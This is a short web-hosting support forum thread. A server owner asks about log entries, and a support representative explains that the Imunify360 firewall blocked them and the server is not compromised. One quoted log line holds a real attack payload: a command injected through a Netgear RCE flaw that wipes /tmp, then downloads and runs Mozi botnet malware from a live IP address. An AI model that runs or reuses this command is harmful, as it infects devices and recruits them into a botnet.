Should I be concerned about these log entries?

Collapse
X
Collapse
 
  • Page of 1
  • Time
  • Show
Clear All
new posts
Previous template Next
  • christopher.scott
    Junior Member
    • Mar 2021
    • 9
    #1

    Should I be concerned about these log entries?

    - Anomaly detected in file /tmp/#sql_80d_2.MAD. Hidden from stats, but showing up on readdir. Possible kernel level rootkit.

    There was a number of these log entries around the same time:

    - IM360 WAF: Netgear unauthenticated RCE||T:APACHE||MVN:ARGS:cmd||MV:rm -rf /tmp/*;wget http://202.88.219.141:50021/Mozi.m -O /tmp/netgear;sh netgear||

    I don’t see #sql_80d_2.MAD in /tmp

    It looks kind of nasty.

    Any insight would be appreciated.

    Thx
    G
    Tags: None
    • skhristich
      Senior Member
      • Nov 2019
      • 595
      #2
      Hello Glenn,
      Thank you for reaching out! These log entries mean that malware requests come to your server in a random order, and the Imunify360 firewall blocks these requests. It does not mean that your server has been compromised.
      You can also create a ticket https://cloudlinux.zendesk.com/hc/en-us/requests/new to check the infection of the server, and our malware analysts will be able to check for sure.
      If you have any other questions, feel free to ask here. Thank you for contacting us.

        Comment

        • glenn
          Member
          • Jun 2017
          • 38
          #3
          Thanks Sergey for your reply. My tech confirmed as well that its nothing to worry about.

            Comment

            Previous template Next
            Working...

            We process personal data about users of our site, through the use of cookies and other technologies, to deliver our services, personalize advertising, and to analyze site activity. We may share certain information about our users with our advertising and analytics partners. For additional details, refer to our Privacy Policy.

            By clicking "I AGREE" below, you agree to our Privacy Policy and our personal data processing and cookie practices as described therein. You also acknowledge that this forum may be hosted outside your country and you consent to the collection, storage, and processing of your data in the country where this forum is hosted.

            I Agree